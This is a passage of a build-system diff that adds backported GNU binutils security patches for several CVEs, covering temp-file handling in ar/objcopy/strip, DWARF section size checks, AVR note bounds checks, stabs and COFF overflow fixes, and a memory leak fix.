+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=d3edaa91d4cf7202ec14342410194841e2f67f12]
+CVE: CVE-2021-20197
+Signed-off-by: Vinay Kumar <vinay.m.engg@gmail.com>
+---
+ bfd/bfd-in2.h | 2 +
+ bfd/opncls.c | 33 ++++++++++
+ binutils/ar.c | 15 +++--
+ binutils/arsup.c | 37 ++++++++----
+ binutils/bucomm.c | 4 +-
+ binutils/bucomm.h | 5 +-
+ binutils/objcopy.c | 37 +++++++-----
+ binutils/rename.c | 148 +++++++++++----------------------------------
+ 8 files changed, 133 insertions(+), 148 deletions(-)
+
+diff --git a/bfd/bfd-in2.h b/bfd/bfd-in2.h
+index 2e453c50c18..e53f54a8ab7 100644
+--- a/bfd/bfd-in2.h
++++ b/bfd/bfd-in2.h
+@@ -588,6 +588,8 @@ bfd *bfd_openr (const char *filename, const char *target);
+
+ bfd *bfd_fdopenr (const char *filename, const char *target, int fd);
+
++bfd *bfd_fdopenw (const char *filename, const char *target, int fd);
++
+ bfd *bfd_openstreamr (const char * filename, const char * target,
+ void * stream);
+
+diff --git a/bfd/opncls.c b/bfd/opncls.c
+index a03ad51c8fa..f9da97ed710 100644
+--- a/bfd/opncls.c
++++ b/bfd/opncls.c
+@@ -370,6 +370,39 @@ bfd_fdopenr (const char *filename, const char *target, int fd)
+ return bfd_fopen (filename, target, mode, fd);
+ }
+
++/*
++FUNCTION
++ bfd_fdopenw
++
++SYNOPSIS
++ bfd *bfd_fdopenw (const char *filename, const char *target, int fd);
++
++DESCRIPTION
++ <<bfd_fdopenw>> is exactly like <<bfd_fdopenr>> with the exception that
++ the resulting BFD is suitable for output.
++*/
++
++bfd *
++bfd_fdopenw (const char *filename, const char *target, int fd)
++{
++ bfd *out = bfd_fdopenr (filename, target, fd);
++
++ if (out != NULL)
++ {
++ if (!bfd_write_p (out))
++ {
++ close (fd);
++ _bfd_delete_bfd (out);
++ out = NULL;
++ bfd_set_error (bfd_error_invalid_operation);
++ }
++ else
++ out->direction = write_direction;
++ }
++
++ return out;
++}
++
+ /*
+ FUNCTION
+ bfd_openstreamr
+diff --git a/binutils/ar.c b/binutils/ar.c
+index 1057db9980e..c33a11e0d70 100644
+--- a/binutils/ar.c
++++ b/binutils/ar.c
+@@ -1195,20 +1195,23 @@ write_archive (bfd *iarch)
+ bfd *obfd;
+ char *old_name, *new_name;
+ bfd *contents_head = iarch->archive_next;
++ int ofd = -1;
+
+- old_name = (char *) xmalloc (strlen (bfd_get_filename (iarch)) + 1);
+- strcpy (old_name, bfd_get_filename (iarch));
+- new_name = make_tempname (old_name);
++ old_name = xstrdup (bfd_get_filename (iarch));
++ new_name = make_tempname (old_name, &ofd);
+
+ if (new_name == NULL)
+ bfd_fatal (_("could not create temporary file whilst writing archive"));
+
+ output_filename = new_name;
+
+- obfd = bfd_openw (new_name, bfd_get_target (iarch));
++ obfd = bfd_fdopenw (new_name, bfd_get_target (iarch), ofd);
+
+ if (obfd == NULL)
+- bfd_fatal (old_name);
++ {
++ close (ofd);
++ bfd_fatal (old_name);
++ }
+
+ output_bfd = obfd;
+
+@@ -1246,7 +1249,7 @@ write_archive (bfd *iarch)
+ /* We don't care if this fails; we might be creating the archive. */
+ bfd_close (iarch);
+
+- if (smart_rename (new_name, old_name, 0) != 0)
++ if (smart_rename (new_name, old_name, NULL) != 0)
+ xexit (1);
+ free (old_name);
+ free (new_name);
+diff --git a/binutils/arsup.c b/binutils/arsup.c
+index 00967c972cd..b8ae4f7ec1a 100644
+--- a/binutils/arsup.c
++++ b/binutils/arsup.c
+@@ -42,6 +42,8 @@ extern int deterministic;
+
+ static bfd *obfd;
+ static char *real_name;
++static char *temp_name;
++static int real_ofd;
+ static FILE *outfile;
+
+ static void
+@@ -149,27 +151,24 @@ maybequit (void)
+ void
+ ar_open (char *name, int t)
+ {
+- char *tname;
+- const char *bname = lbasename (name);
+- real_name = name;
++ real_name = xstrdup (name);
++ temp_name = make_tempname (real_name, &real_ofd);
+
+- /* Prepend tmp- to the beginning, to avoid file-name clashes after
+- truncation on filesystems with limited namespaces (DOS). */
+- if (asprintf (&tname, "%.*stmp-%s", (int) (bname - name), name, bname) == -1)
++ if (temp_name == NULL)
+ {
+- fprintf (stderr, _("%s: Can't allocate memory for temp name (%s)\n"),
++ fprintf (stderr, _("%s: Can't open temporary file (%s)\n"),
+ program_name, strerror(errno));
+ maybequit ();
+ return;
+ }
+
+- obfd = bfd_openw (tname, NULL);
++ obfd = bfd_fdopenw (temp_name, NULL, real_ofd);
+
+ if (!obfd)
+ {
+ fprintf (stderr,
+ _("%s: Can't open output archive %s\n"),
+- program_name, tname);
++ program_name, temp_name);
+
+ maybequit ();
+ }
+@@ -344,16 +343,30 @@ ar_save (void)
+ }
+ else
+ {
+- char *ofilename = xstrdup (bfd_get_filename (obfd));
++ struct stat target_stat;
+
+ if (deterministic > 0)
+ obfd->flags |= BFD_DETERMINISTIC_OUTPUT;
+
+ bfd_close (obfd);
+
+- smart_rename (ofilename, real_name, 0);
++ if (stat (real_name, &target_stat) != 0)
++ {
++ /* The temp file created in ar_open has mode 0600 as per mkstemp.
++ Create the real empty output file here so smart_rename will
++ update the mode according to the process umask. */
++ obfd = bfd_openw (real_name, NULL);
++ if (obfd != NULL)
++ {
++ bfd_set_format (obfd, bfd_archive);
++ bfd_close (obfd);
++ }
++ }
++
++ smart_rename (temp_name, real_name, NULL);
+ obfd = 0;
+- free (ofilename);
++ free (temp_name);
++ free (real_name);
+ }
+ }
+
+diff --git a/binutils/bucomm.c b/binutils/bucomm.c
+index 9e6a02843e6..53244201f89 100644
+--- a/binutils/bucomm.c
++++ b/binutils/bucomm.c
+@@ -532,7 +532,7 @@ template_in_dir (const char *path)
+ as FILENAME. */
+
+ char *
+-make_tempname (const char *filename)
++make_tempname (const char *filename, int *ofd)
+ {
+ char *tmpname = template_in_dir (filename);
+ int fd;
+@@ -550,7 +550,7 @@ make_tempname (const char *filename)
+ free (tmpname);
+ return NULL;
+ }
+- close (fd);
++ *ofd = fd;
+ return tmpname;
+ }
+
+diff --git a/binutils/bucomm.h b/binutils/bucomm.h
+index d8318343f78..2b164e0af68 100644
+--- a/binutils/bucomm.h
++++ b/binutils/bucomm.h
+@@ -51,7 +51,7 @@ int display_info (void);
+
+ void print_arelt_descr (FILE *, bfd *, bfd_boolean, bfd_boolean);
+
+-char *make_tempname (const char *);
++char *make_tempname (const char *, int *);
+ char *make_tempdir (const char *);
+
+ bfd_vma parse_vma (const char *, const char *);
+@@ -71,7 +71,8 @@ extern void print_version (const char *);
+ /* In rename.c. */
+ extern void set_times (const char *, const struct stat *);
+
+-extern int smart_rename (const char *, const char *, int);
++extern int smart_rename (const char *, const char *, struct stat *);
++
+
+ /* In libiberty. */
+ void *xmalloc (size_t);
+diff --git a/binutils/objcopy.c b/binutils/objcopy.c
+index 212e25144e6..5ccbd926610 100644
+--- a/binutils/objcopy.c
++++ b/binutils/objcopy.c
+@@ -3682,7 +3682,7 @@ set_long_section_mode (bfd *output_bfd, bfd *input_bfd, enum long_section_name_h
+ /* The top-level control. */
+
+ static void
+-copy_file (const char *input_filename, const char *output_filename,
++copy_file (const char *input_filename, const char *output_filename, int ofd,
+ const char *input_target, const char *output_target,
+ const bfd_arch_info_type *input_arch)
+ {
+@@ -3757,9 +3757,14 @@ copy_file (const char *input_filename, const char *output_filename,
+ else
+ force_output_target = TRUE;
+
+- obfd = bfd_openw (output_filename, output_target);
++ if (ofd >= 0)
++ obfd = bfd_fdopenw (output_filename, output_target, ofd);
++ else
++ obfd = bfd_openw (output_filename, output_target);
++
+ if (obfd == NULL)
+ {
++ close (ofd);
+ bfd_nonfatal_message (output_filename, NULL, NULL, NULL);
+ status = 1;
+ return;
+@@ -3787,13 +3792,19 @@ copy_file (const char *input_filename, const char *output_filename,
+ if (output_target == NULL)
+ output_target = bfd_get_target (ibfd);
+
+- obfd = bfd_openw (output_filename, output_target);
++ if (ofd >= 0)
++ obfd = bfd_fdopenw (output_filename, output_target, ofd);
++ else
++ obfd = bfd_openw (output_filename, output_target);
++
+ if (obfd == NULL)
+ {
++ close (ofd);
+ bfd_nonfatal_message (output_filename, NULL, NULL, NULL);
+ status = 1;
+ return;
+ }
++
+ /* This is a no-op on non-Coff targets. */
+ set_long_section_mode (obfd, ibfd, long_section_names);
+
+@@ -4746,6 +4757,7 @@ strip_main (int argc, char *argv[])
+ int hold_status = status;
+ struct stat statbuf;
+ char *tmpname;
++ int tmpfd = -1;
+
+ if (get_file_size (argv[i]) < 1)
+ {
+@@ -4760,7 +4772,7 @@ strip_main (int argc, char *argv[])
+
+ if (output_file == NULL
+ || filename_cmp (argv[i], output_file) == 0)
+- tmpname = make_tempname (argv[i]);
++ tmpname = make_tempname (argv[i], &tmpfd);
+ else
+ tmpname = output_file;
+
+@@ -4773,15 +4785,13 @@ strip_main (int argc, char *argv[])
+ }
+
+ status = 0;
+- copy_file (argv[i], tmpname, input_target, output_target, NULL);
++ copy_file (argv[i], tmpname, tmpfd, input_target, output_target, NULL);
+ if (status == 0)
+ {
+- if (preserve_dates)
+- set_times (tmpname, &statbuf);
+ if (output_file != tmpname)
+ status = (smart_rename (tmpname,
+ output_file ? output_file : argv[i],
+- preserve_dates) != 0);
++ preserve_dates ? &statbuf : NULL) != 0);
+ if (status == 0)
+ status = hold_status;
+ }
+@@ -4993,7 +5003,7 @@ copy_main (int argc, char *argv[])
+ bfd_boolean formats_info = FALSE;
+ bfd_boolean use_globalize = FALSE;
+ bfd_boolean use_keep_global = FALSE;
+- int c;
++ int c, tmpfd = -1;
+ struct stat statbuf;
+ const bfd_arch_info_type *input_arch = NULL;
+
+@@ -5839,7 +5849,7 @@ copy_main (int argc, char *argv[])
+ are the same, then create a temp and rename the result into the input. */
+ if (output_filename == NULL
+ || filename_cmp (input_filename, output_filename) == 0)
+- tmpname = make_tempname (input_filename);
++ tmpname = make_tempname (input_filename, &tmpfd);
+ else
+ tmpname = output_filename;
+
+@@ -5847,14 +5857,13 @@ copy_main (int argc, char *argv[])
+ fatal (_("warning: could not create temporary file whilst copying '%s', (error: %s)"),
+ input_filename, strerror (errno));
+
+- copy_file (input_filename, tmpname, input_target, output_target, input_arch);
++ copy_file (input_filename, tmpname, tmpfd, input_target, output_target,
++ input_arch);
+ if (status == 0)
+ {
+- if (preserve_dates)
+- set_times (tmpname, &statbuf);
+ if (tmpname != output_filename)
+ status = (smart_rename (tmpname, input_filename,
+- preserve_dates) != 0);
++ preserve_dates ? &statbuf : NULL) != 0);
+ }
+ else
+ unlink_if_ordinary (tmpname);
+diff --git a/binutils/rename.c b/binutils/rename.c
+index bf3b68d0462..07d44d0f314 100644
+--- a/binutils/rename.c
++++ b/binutils/rename.c
+@@ -24,14 +24,9 @@
+
+ #ifdef HAVE_GOOD_UTIME_H
+ #include <utime.h>
+-#else /* ! HAVE_GOOD_UTIME_H */
+-#ifdef HAVE_UTIMES
++#elif defined HAVE_UTIMES
+ #include <sys/time.h>
+-#endif /* HAVE_UTIMES */
+-#endif /* ! HAVE_GOOD_UTIME_H */
+-
+-#if ! defined (_WIN32) || defined (__CYGWIN32__)
+-static int simple_copy (const char *, const char *);
++#endif
+
+ /* The number of bytes to copy at once. */
+ #define COPY_BUF 8192
+@@ -82,7 +77,6 @@ simple_copy (const char *from, const char *to)
+ }
+ return 0;
+ }
+-#endif /* __CYGWIN32__ or not _WIN32 */
+
+ /* Set the times of the file DESTINATION to be the same as those in
+ STATBUF. */
+@@ -91,122 +85,52 @@ void
+ set_times (const char *destination, const struct stat *statbuf)
+ {
+ int result;
+-
+- {
+ #ifdef HAVE_GOOD_UTIME_H
+- struct utimbuf tb;
+-
+- tb.actime = statbuf->st_atime;
+- tb.modtime = statbuf->st_mtime;
+- result = utime (destination, &tb);
+-#else /* ! HAVE_GOOD_UTIME_H */
+-#ifndef HAVE_UTIMES
+- long tb[2];
+-
+- tb[0] = statbuf->st_atime;
+- tb[1] = statbuf->st_mtime;
+- result = utime (destination, tb);
+-#else /* HAVE_UTIMES */
+- struct timeval tv[2];
+-
+- tv[0].tv_sec = statbuf->st_atime;
+- tv[0].tv_usec = 0;
+- tv[1].tv_sec = statbuf->st_mtime;
+- tv[1].tv_usec = 0;
+- result = utimes (destination, tv);
+-#endif /* HAVE_UTIMES */
+-#endif /* ! HAVE_GOOD_UTIME_H */
+- }
++ struct utimbuf tb;
++
++ tb.actime = statbuf->st_atime;
++ tb.modtime = statbuf->st_mtime;
++ result = utime (destination, &tb);
++#elif defined HAVE_UTIMES
++ struct timeval tv[2];
++
++ tv[0].tv_sec = statbuf->st_atime;
++ tv[0].tv_usec = 0;
++ tv[1].tv_sec = statbuf->st_mtime;
++ tv[1].tv_usec = 0;
++ result = utimes (destination, tv);
++#else
++ long tb[2];
++
++ tb[0] = statbuf->st_atime;
++ tb[1] = statbuf->st_mtime;
++ result = utime (destination, tb);
++#endif
+
+ if (result != 0)
+ non_fatal (_("%s: cannot set time: %s"), destination, strerror (errno));
+ }
+
+-#ifndef S_ISLNK
+-#ifdef S_IFLNK
+-#define S_ISLNK(m) (((m) & S_IFMT) == S_IFLNK)
+-#else
+-#define S_ISLNK(m) 0
+-#define lstat stat
+-#endif
+-#endif
+-
+-/* Rename FROM to TO, copying if TO is a link.
+- Return 0 if ok, -1 if error. */
++/* Copy FROM to TO. TARGET_STAT has the file status that, if non-NULL,
++ is used to fix up timestamps. Return 0 if ok, -1 if error.
++ At one time this function renamed files, but file permissions are
++ tricky to update given the number of different schemes used by
++ various systems. So now we just copy. */
+
+ int
+-smart_rename (const char *from, const char *to, int preserve_dates ATTRIBUTE_UNUSED)
++smart_rename (const char *from, const char *to,
++ struct stat *target_stat)
+ {
+- bfd_boolean exists;
+- struct stat s;
+- int ret = 0;
+-
+- exists = lstat (to, &s) == 0;
+-
+-#if defined (_WIN32) && !defined (__CYGWIN32__)
+- /* Win32, unlike unix, will not erase `to' in `rename(from, to)' but
+- fail instead. Also, chown is not present. */
++ int ret;
+
+- if (exists)
+- remove (to);
+-
+- ret = rename (from, to);
++ ret = simple_copy (from, to);
+ if (ret != 0)
+- {
+- /* We have to clean up here. */
+- non_fatal (_("unable to rename '%s'; reason: %s"), to, strerror (errno));
+- unlink (from);
+- }
+-#else
+- /* Use rename only if TO is not a symbolic link and has
+- only one hard link, and we have permission to write to it. */
+- if (! exists
+- || (!S_ISLNK (s.st_mode)
+- && S_ISREG (s.st_mode)
+- && (s.st_mode & S_IWUSR)
+- && s.st_nlink == 1)
+- )
+- {
+- ret = rename (from, to);
+- if (ret == 0)
+- {
+- if (exists)
+- {
+- /* Try to preserve the permission bits and ownership of
+- TO. First get the mode right except for the setuid
+- bit. Then change the ownership. Then fix the setuid
+- bit. We do the chmod before the chown because if the
+- chown succeeds, and we are a normal user, we won't be
+- able to do the chmod afterward. We don't bother to
+- fix the setuid bit first because that might introduce
+- a fleeting security problem, and because the chown
+- will clear the setuid bit anyhow. We only fix the
+- setuid bit if the chown succeeds, because we don't
+- want to introduce an unexpected setuid file owned by
+- the user running objcopy. */
+- chmod (to, s.st_mode & 0777);
+- if (chown (to, s.st_uid, s.st_gid) >= 0)
+- chmod (to, s.st_mode & 07777);
+- }
+- }
+- else
+- {
+- /* We have to clean up here. */
+- non_fatal (_("unable to rename '%s'; reason: %s"), to, strerror (errno));
+- unlink (from);
+- }
+- }
+- else
+- {
+- ret = simple_copy (from, to);
+- if (ret != 0)
+- non_fatal (_("unable to copy file '%s'; reason: %s"), to, strerror (errno));
++ non_fatal (_("unable to copy file '%s'; reason: %s"),
++ to, strerror (errno));
+
+- if (preserve_dates)
+- set_times (to, &s);
+- unlink (from);
+- }
+-#endif /* _WIN32 && !__CYGWIN32__ */
++ if (target_stat != NULL)
++ set_times (to, target_stat);
++ unlink (from);
+
+ return ret;
+ }
+--
+2.17.1
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch
new file mode 100644
index 0000000000..1502d03f43
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-3487.patch
@@ -0,0 +1,83 @@
+From 647cebce12a6b0a26960220caff96ff38978cf24 Mon Sep 17 00:00:00 2001
+From: Nick Clifton <nickc@redhat.com>
+Date: Thu, 26 Nov 2020 17:08:33 +0000
+Subject: [PATCH] Prevent a memory allocation failure when parsing corrupt
+ DWARF debug sections.
+
+ PR 26946
+ * dwarf2.c (read_section): Check for debug sections with excessive
+ sizes.
+
+
+Upstream-Status: Backport [
+https://sourceware.org/git/?p=binutils-gdb.git;a=patch;h=647cebce12a6b0a26960220caff96ff38978cf24
+]
+CVE: CVE-2021-3487
+Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
+
+---
+ bfd/dwarf2.c | 25 +++++++++++++++++++------
+ 1 files changed, 25 insertions(+), 6 deletions(-)
+
+diff --git a/bfd/dwarf2.c b/bfd/dwarf2.c
+index 977bf43a6a1..8bbfc81d3e7 100644
+--- a/bfd/dwarf2.c
++++ b/bfd/dwarf2.c
+@@ -531,22 +531,24 @@ read_section (bfd * abfd,
+ bfd_byte ** section_buffer,
+ bfd_size_type * section_size)
+ {
+- asection *msec;
+ const char *section_name = sec->uncompressed_name;
+ bfd_byte *contents = *section_buffer;
+- bfd_size_type amt;
+
+ /* The section may have already been read. */
+ if (contents == NULL)
+ {
++ bfd_size_type amt;
++ asection *msec;
++ ufile_ptr filesize;
++
+ msec = bfd_get_section_by_name (abfd, section_name);
+- if (! msec)
++ if (msec == NULL)
+ {
+ section_name = sec->compressed_name;
+ if (section_name != NULL)
+ msec = bfd_get_section_by_name (abfd, section_name);
+ }
+- if (! msec)
++ if (msec == NULL)
+ {
+ _bfd_error_handler (_("DWARF error: can't find %s section."),
+ sec->uncompressed_name);
+@@ -554,12 +556,23 @@ read_section (bfd * abfd,
+ return FALSE;
+ }
+
+- *section_size = msec->rawsize ? msec->rawsize : msec->size;
++ amt = bfd_get_section_limit_octets (abfd, msec);
++ filesize = bfd_get_file_size (abfd);
++ if (amt >= filesize)
++ {
++ /* PR 26946 */
++ _bfd_error_handler (_("DWARF error: section %s is larger than its filesize! (0x%lx vs 0x%lx)"),
++ section_name, (long) amt, (long) filesize);
++ bfd_set_error (bfd_error_bad_value);
++ return FALSE;
++ }
++ *section_size = amt;
+ /* Paranoia - alloc one extra so that we can make sure a string
+ section is NUL terminated. */
+- amt = *section_size + 1;
++ amt += 1;
+ if (amt == 0)
+ {
++ /* Paranoia - this should never happen. */
+ bfd_set_error (bfd_error_no_memory);
+ return FALSE;
+ }
+--
+2.27.0
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch
new file mode 100644
index 0000000000..5f56dd7696
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-3549.patch
@@ -0,0 +1,183 @@
+From 1cfcf3004e1830f8fe9112cfcd15285508d2c2b7 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 11 Feb 2021 16:56:42 +1030
+Subject: [PATCH] PR27290, PR27293, PR27295, various avr objdump fixes
+
+Adds missing sanity checks for avr device info note, to avoid
+potential buffer overflows. Uses bfd_malloc_and_get_section for
+sanity checking section size.
+
+ PR 27290
+ PR 27293
+ PR 27295
+ * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting.
+ Use bfd_malloc_and_get_section.
+ (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity
+ check namesz. Return NULL if descsz is too small. Ensure
+ string table is terminated.
+ (elf32_avr_get_device_info): Formatting. Add note_size param.
+ Sanity check note.
+ (elf32_avr_dump_mem_usage): Adjust to suit.
+
+Upstream-Status: Backport
+CVE: CVE-2021-3549
+Signed-of-by: Armin Kuster <akuster@mvista.com>
+
+---
+diff --git a/binutils/ChangeLog b/binutils/ChangeLog
+index 1e9a96c9bb6..02e5019204e 100644
+--- a/binutils/ChangeLog
++++ b/binutils/ChangeLog
+@@ -1,3 +1,17 @@
++2021-02-11 Alan Modra <amodra@gmail.com>
++
++ PR 27290
++ PR 27293
++ PR 27295
++ * od-elf32_avr.c (elf32_avr_get_note_section_contents): Formatting.
++ Use bfd_malloc_and_get_section.
++ (elf32_avr_get_note_desc): Formatting. Return descsz. Sanity
++ check namesz. Return NULL if descsz is too small. Ensure
++ string table is terminated.
++ (elf32_avr_get_device_info): Formatting. Add note_size param.
++ Sanity check note.
++ (elf32_avr_dump_mem_usage): Adjust to suit.
++
+ 2020-03-25 H.J. Lu <hongjiu.lu@intel.com>
+
+ * ar.c (main): Update bfd_plugin_set_program_name call.
+diff --git a/binutils/od-elf32_avr.c b/binutils/od-elf32_avr.c
+index 5ec99957fe9..1d32bce918e 100644
+--- a/binutils/od-elf32_avr.c
++++ b/binutils/od-elf32_avr.c
+@@ -77,23 +77,29 @@ elf32_avr_filter (bfd *abfd)
+ return bfd_get_flavour (abfd) == bfd_target_elf_flavour;
+ }
+
+-static char*
++static char *
+ elf32_avr_get_note_section_contents (bfd *abfd, bfd_size_type *size)
+ {
+ asection *section;
++ bfd_byte *contents;
+
+- if ((section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo")) == NULL)
++ section = bfd_get_section_by_name (abfd, ".note.gnu.avr.deviceinfo");
++ if (section == NULL)
+ return NULL;
+
+- *size = bfd_section_size (section);
+- char *contents = (char *) xmalloc (*size);
+- bfd_get_section_contents (abfd, section, contents, 0, *size);
++ if (!bfd_malloc_and_get_section (abfd, section, &contents))
++ {
++ free (contents);
++ contents = NULL;
++ }
+
+- return contents;
++ *size = bfd_section_size (section);
++ return (char *) contents;
+ }
+
+-static char* elf32_avr_get_note_desc (bfd *abfd, char *contents,
+- bfd_size_type size)
++static char *
++elf32_avr_get_note_desc (bfd *abfd, char *contents, bfd_size_type size,
++ bfd_size_type *descsz)
+ {
+ Elf_External_Note *xnp = (Elf_External_Note *) contents;
+ Elf_Internal_Note in;
+@@ -107,42 +113,54 @@ static char* elf32_avr_get_note_desc (bfd *abfd, char *contents,
+ if (in.namesz > contents - in.namedata + size)
+ return NULL;
+
++ if (in.namesz != 4 || strcmp (in.namedata, "AVR") != 0)
++ return NULL;
++
+ in.descsz = bfd_get_32 (abfd, xnp->descsz);
+ in.descdata = in.namedata + align_power (in.namesz, 2);
+- if (in.descsz != 0
+- && (in.descdata >= contents + size
+- || in.descsz > contents - in.descdata + size))
++ if (in.descsz < 6 * sizeof (uint32_t)
++ || in.descdata >= contents + size
++ || in.descsz > contents - in.descdata + size)
+ return NULL;
+
+- if (strcmp (in.namedata, "AVR") != 0)
+- return NULL;
++ /* If the note has a string table, ensure it is 0 terminated. */
++ if (in.descsz > 8 * sizeof (uint32_t))
++ in.descdata[in.descsz - 1] = 0;
+
++ *descsz = in.descsz;
+ return in.descdata;
+ }
+
+ static void
+ elf32_avr_get_device_info (bfd *abfd, char *description,
+- deviceinfo *device)
++ bfd_size_type desc_size, deviceinfo *device)
+ {
+ if (description == NULL)
+ return;
+
+ const bfd_size_type memory_sizes = 6;
+
+- memcpy (device, description, memory_sizes * sizeof(uint32_t));
+- device->name = NULL;
++ memcpy (device, description, memory_sizes * sizeof (uint32_t));
++ desc_size -= memory_sizes * sizeof (uint32_t);
++ if (desc_size < 8)
++ return;
+
+- uint32_t *stroffset_table = ((uint32_t *) description) + memory_sizes;
++ uint32_t *stroffset_table = (uint32_t *) description + memory_sizes;
+ bfd_size_type stroffset_table_size = bfd_get_32 (abfd, stroffset_table);
+- char *str_table = ((char *) stroffset_table) + stroffset_table_size;
+
+ /* If the only content is the size itself, there's nothing in the table */
+- if (stroffset_table_size == 4)
++ if (stroffset_table_size < 8)
+ return;
++ if (desc_size <= stroffset_table_size)
++ return;
++ desc_size -= stroffset_table_size;
+
+ /* First entry is the device name index. */
+ uint32_t device_name_index = bfd_get_32 (abfd, stroffset_table + 1);
++ if (device_name_index >= desc_size)
++ return;
+
++ char *str_table = (char *) stroffset_table + stroffset_table_size;
+ device->name = str_table + device_name_index;
+ }
+
+@@ -183,7 +201,7 @@ static void
+ elf32_avr_dump_mem_usage (bfd *abfd)
+ {
+ char *description = NULL;
+- bfd_size_type note_section_size = 0;
++ bfd_size_type sec_size, desc_size;
+
+ deviceinfo device = { 0, 0, 0, 0, 0, 0, NULL };
+ device.name = "Unknown";
+@@ -192,13 +210,13 @@ elf32_avr_dump_mem_usage (bfd *abfd)
+ bfd_size_type text_usage = 0;
+ bfd_size_type eeprom_usage = 0;
+
+- char *contents = elf32_avr_get_note_section_contents (abfd,
+- &note_section_size);
++ char *contents = elf32_avr_get_note_section_contents (abfd, &sec_size);
+
+ if (contents != NULL)
+ {
+- description = elf32_avr_get_note_desc (abfd, contents, note_section_size);
+- elf32_avr_get_device_info (abfd, description, &device);
++ description = elf32_avr_get_note_desc (abfd, contents, sec_size,
++ &desc_size);
++ elf32_avr_get_device_info (abfd, description, desc_size, &device);
+ }
+
+ elf32_avr_get_memory_usage (abfd, &text_usage, &data_usage,
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch b/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch
new file mode 100644
index 0000000000..2addf5139e
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2021-46174.patch
@@ -0,0 +1,35 @@
+From 46322722ad40ac1a75672ae0f62f4969195f1368 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Thu, 20 Jan 2022 13:58:38 +1030
+Subject: [PATCH] PR28753, buffer overflow in read_section_stabs_debugging_info
+
+ PR 28753
+ * rddbg.c (read_section_stabs_debugging_info): Don't read past
+ end of section when concatentating stab strings.
+
+CVE: CVE-2021-46174
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=cad4d6b91e97]
+
+(cherry picked from commit 085b299b71721e15f5c5c5344dc3e4e4536dadba)
+(cherry picked from commit cad4d6b91e97b6962807d33c04ed7e7797788438)
+Signed-off-by: poojitha adireddy <pooadire@cisco.com>
+---
+ binutils/rddbg.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/binutils/rddbg.c b/binutils/rddbg.c
+index 72e934055b5..5e76d94a3c4 100644
+--- a/binutils/rddbg.c
++++ b/binutils/rddbg.c
+@@ -207,7 +207,7 @@ read_section_stabs_debugging_info (bfd *abfd, asymbol **syms, long symcount,
+ an attempt to read the byte before 'strings' would occur. */
+ while ((len = strlen (s)) > 0
+ && s[len - 1] == '\\'
+- && stab + 12 < stabs + stabsize)
++ && stab + 16 <= stabs + stabsize)
+ {
+ char *p;
+
+--
+2.23.1
+
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch
new file mode 100644
index 0000000000..102d65f8a6
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-38533.patch
@@ -0,0 +1,37 @@
+From ef186fe54aa6d281a3ff8a9528417e5cc614c797 Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Sat, 13 Aug 2022 15:32:47 +0930
+Subject: [PATCH] PR29482 - strip: heap-buffer-overflow
+
+ PR 29482
+ * coffcode.h (coff_set_section_contents): Sanity check _LIB.
+
+CVE: CVE-2022-38533
+Upstream-Status: Backport [https://sourceware.org/git/gitweb.cgi?p=binutils-gdb.git;h=ef186fe54aa6d281a3ff8a9528417e5cc614c797]
+
+Signed-off-by: Florin Diaconescu <florin.diaconescu009@gmail.com>
+
+---
+ bfd/coffcode.h | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+diff --git a/bfd/coffcode.h b/bfd/coffcode.h
+index dec2e9c6370..75c18d88602 100644
+--- a/bfd/coffcode.h
++++ b/bfd/coffcode.h
+@@ -4170,10 +4170,13 @@ coff_set_section_contents (bfd * abfd,
+
+ rec = (bfd_byte *) location;
+ recend = rec + count;
+- while (rec < recend)
++ while (recend - rec >= 4)
+ {
++ size_t len = bfd_get_32 (abfd, rec);
++ if (len == 0 || len > (size_t) (recend - rec) / 4)
++ break;
++ rec += len * 4;
+ ++section->lma;
+- rec += bfd_get_32 (abfd, rec) * 4;
+ }
+
+ BFD_ASSERT (rec == recend);
diff --git a/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch b/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch
new file mode 100644
index 0000000000..ddb564bc8c
--- /dev/null
+++ b/meta/recipes-devtools/binutils/binutils/CVE-2022-47007.patch
@@ -0,0 +1,32 @@
+From 0ebc886149c22aceaf8ed74267821a59ca9d03eb Mon Sep 17 00:00:00 2001
+From: Alan Modra <amodra@gmail.com>
+Date: Fri, 17 Jun 2022 09:00:41 +0930
+Subject: [PATCH] PR29254, memory leak in stab_demangle_v3_arg
+
+ PR 29254
+ * stabs.c (stab_demangle_v3_arg): Free dt on failure path.
+Upstream-Status: Backport [https://sourceware.org/git/?p=binutils-gdb.git;a=commitdiff_plain;h=0ebc886149c22aceaf8ed74267821a59ca9d03eb]
+CVE: CVE-2022-47007
+Signed-off-by: Virendra Thakur <virendrak@kpit.com>
+Comment: Patch refreshed based on codebase.
+---
+ binutils/stabs.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/binutils/stabs.c b/binutils/stabs.c
+index 2b5241637c1..796ff85b86a 100644
+--- a/binutils/stabs.c
++++ b/binutils/stabs.c
+@@ -5476,7 +5476,10 @@
+ dc->u.s_binary.right,
+ &varargs);
